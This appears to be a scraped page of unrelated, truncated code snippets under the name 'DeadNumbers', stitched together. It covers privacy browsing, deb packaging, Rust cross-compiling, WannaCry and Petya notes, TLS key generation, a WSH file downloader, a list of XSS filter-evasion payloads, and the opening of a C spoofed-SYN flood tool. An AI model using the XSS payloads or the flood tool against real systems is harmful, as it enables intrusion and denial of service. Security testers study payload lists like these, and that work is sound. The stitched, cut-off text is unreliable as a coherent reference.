DeadNumbers

#!/usr/bin/python
# coding=utf-8

# Python version of Zach Holman's "spark"
# https://github.com/holman/spark
# by Stefan van der Walt <stefan@sun.ac.za>

"""
USAGE:

DeadNumbers

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

• Motivation
• Audience
• TL;DR?
• Updates
• Technologies that Affect Security and Privacy

DeadNumbers

Сборка deb-пакетов с OBS

1. http://www.debian.org/doc/debian-policy/ch-sharedlibs.html
2. http://www.debian.org/doc/manuals/maint-guide/dreq.en.html
3. http://www.debian.org/doc/manuals/maint-guide/build.ru.html
4. http://en.opensuse.org/openSUSE:Build_Service_Debian_builds
5. http://ru.opensuse.org/openSUSE:OSC
6. http://ru.opensuse.org/openSUSE:Руководство_по_использованию_службы_сборки

DeadNumbers

Cross-compiling Rust from Linux to Windows using Wine

0. Ensure Rust works on Host

Let's create a dummy project for a test.

$ cargo new test
$ cd test/
$ mkdir examples

DeadNumbers

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

• Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
• Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
• Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
• Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
• Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

DeadNumbers

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

DeadNumbers

// httpget.js: download a file (Windows Script Host)
// usage: cscript httpget.js <url> <file>

(function() {    
    if (WScript.Arguments.Length != 2) {
        WScript.Echo("Usage: httpget.js <url> <file>")
        WScript.Quit(1)
    }
        
    var url = WScript.Arguments(0)

DeadNumbers

Moved to git repository: https://github.com/denji/golang-tls

Generate private key (.key)

# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)

DeadNumbers

#petya #petrWrap #notPetya

Win32/Diskcoder.Petya.C Ransomware attack.

Got new info? Email at isox@vulners.com or @isox_xx Some wrong info? Leave the comment, we will fix it!

Research list

• BI.ZONE

DeadNumbers

/*
    Spoofed SYN by eKKiM
    Educational purpose only please.
    Compile with
    gcc syn.c -pthread
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>